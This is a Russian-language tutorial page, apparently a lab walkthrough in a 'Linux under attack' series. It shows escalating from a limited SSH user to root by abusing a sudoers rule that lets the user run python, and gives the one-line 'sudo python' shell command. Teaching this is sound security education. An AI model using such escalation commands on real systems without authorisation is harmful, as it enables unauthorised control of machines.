> For the complete documentation index, see [llms.txt](https://reeves0x0.gitbook.io/linux-under-attack/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://reeves0x0.gitbook.io/linux-under-attack/privilege-escalation/03-misconfig.md).

# 03 - Misconfig

Нам удалось зайти по ssh. Таким образом мы имеем уже 2 учетные записи на сервере, а значит и увеличили контроль присутствия.\
Снова проводим[ local enumeration](/linux-under-attack/exploitation/02-local-enumeration.md) и понимаем что вторая учетная запись тоже ограничена и не входит в группу [sudo](https://wiki.archlinux.org/title/Sudo_\(%D0%A0%D1%83%D1%81%D1%81%D0%BA%D0%B8%D0%B9\)), однако  учетная запись steven имеет права на использование python !&#x20;

```bash
// логинимся
ssh steven@192.168.140.129
// проверяем права
sudo -l
```

<figure><img src="/files/NdigckQ5ZALKRm8do1yg" alt=""><figcaption><p>мисконфиг в безопасности sudoers</p></figcaption></figure>

Если нам доступен python, с его помощью мы можем получить root шелл.\
Есть отличный ресурс, который собирает разные мисконфиги разных программ, рекомендую [GTFOBins](https://gtfobins.github.io/)&#x20;

```python
// Получем root с помощью python
sudo python -c 'import os; os.system("/bin/sh")'
```

<figure><img src="/files/LGqsk3oYn4l4DalsQqVR" alt=""><figcaption><p>Были Стивеном стали рутом</p></figcaption></figure>

Что тут произошло ? \
Если с помощью sudo разрешен запуск двоичного файла от имени суперпользователя, он не теряет повышенных привилегий и может использоваться для доступа к файловой системе, расширения или поддержания привилегированного доступа.\
Вот что )))

Кстати рекомендую скрипт [Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum) для быстрой энумерации и проверки на мисконфиги.
